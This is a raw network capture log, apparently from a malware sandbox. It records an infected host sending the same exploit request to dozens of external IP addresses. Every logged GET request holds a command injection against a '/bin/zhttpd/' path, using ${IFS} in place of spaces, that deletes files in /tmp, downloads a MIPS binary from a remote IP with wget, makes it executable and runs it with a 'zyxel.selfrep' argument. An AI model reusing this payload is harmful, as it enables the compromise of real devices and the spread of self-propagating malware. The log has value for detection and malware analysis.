                                                Jan 28, 2024 10:16:13.636761904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1491192.168.2.234515469.159.24.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636769056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1492192.168.2.2348726170.156.74.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636812925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1493192.168.2.2359384166.141.200.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636831999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1494192.168.2.2355858223.146.1.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636851072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1495192.168.2.234910644.83.17.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636885881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1496192.168.2.2340678168.43.154.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636909008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1497192.168.2.2357106206.162.90.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636959076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1498192.168.2.234107683.138.196.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636969090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1499192.168.2.2355016208.144.18.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637000084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1500192.168.2.234733427.126.253.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637025118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1501192.168.2.2340562158.76.22.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637056112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1502192.168.2.2360592182.90.21.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637079954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1503192.168.2.2348244209.251.27.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637131929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1504192.168.2.235761062.175.252.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637162924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1505192.168.2.235636848.147.64.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637192011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1506192.168.2.2341576208.131.131.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637192011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1507192.168.2.2333724175.145.96.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637228966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1508192.168.2.234925412.90.83.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637228966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1509192.168.2.2353740164.85.59.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637243032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1510192.168.2.2359996201.243.234.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637273073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1511192.168.2.2333288121.56.218.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637379885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1512192.168.2.2356622212.20.27.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637379885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1513192.168.2.2335872141.238.230.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637417078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1514192.168.2.235535244.81.251.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637429953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1515192.168.2.2336730184.239.150.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637440920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1516192.168.2.2356916174.237.193.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637460947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1517192.168.2.2343124159.184.11.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637482882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1518192.168.2.2339216111.223.22.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637500048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1519192.168.2.2338052136.133.84.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637505054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1520192.168.2.2337786113.165.127.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637538910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1521192.168.2.2347736171.36.186.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637552977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1522192.168.2.2354152157.4.29.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637581110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1523192.168.2.2342118169.134.98.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637608051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1524192.168.2.2343966208.71.22.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637644053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1525192.168.2.2338094103.169.82.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637686014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1526192.168.2.233945889.35.174.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637691975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1527192.168.2.2345360111.132.196.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637727022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1528192.168.2.2349736157.135.50.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637737989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1529192.168.2.2355822173.199.87.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637773991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1530192.168.2.233628695.18.105.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637793064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1531192.168.2.233754846.50.51.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637813091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1532192.168.2.23374028.55.112.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637842894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1533192.168.2.234423453.250.21.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637871027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1534192.168.2.234846264.163.104.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637880087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1535192.168.2.2344542114.132.179.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637917995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1536192.168.2.234447442.245.15.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637953997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1537192.168.2.234623437.74.11.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637975931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1538192.168.2.235684269.194.93.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.637995005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1539192.168.2.2348656131.17.79.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.640477896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1540192.168.2.233827279.61.26.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.640500069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1541192.168.2.23574329.139.29.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.640582085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1542192.168.2.2353500220.13.113.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.640966892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1543192.168.2.2352382220.213.7.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641043901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1544192.168.2.234454473.167.32.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641073942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1545192.168.2.235529050.249.234.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641099930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1546192.168.2.2338604184.206.224.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641135931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1547192.168.2.233545034.43.54.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641144037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1548192.168.2.2342306218.95.245.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641160965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1549192.168.2.233537425.158.43.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641174078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1550192.168.2.235462847.119.146.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641206980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1551192.168.2.2357664121.149.217.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641247988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1552192.168.2.2353184222.200.62.153443
                                                TimestampBytes transferredDirectionData
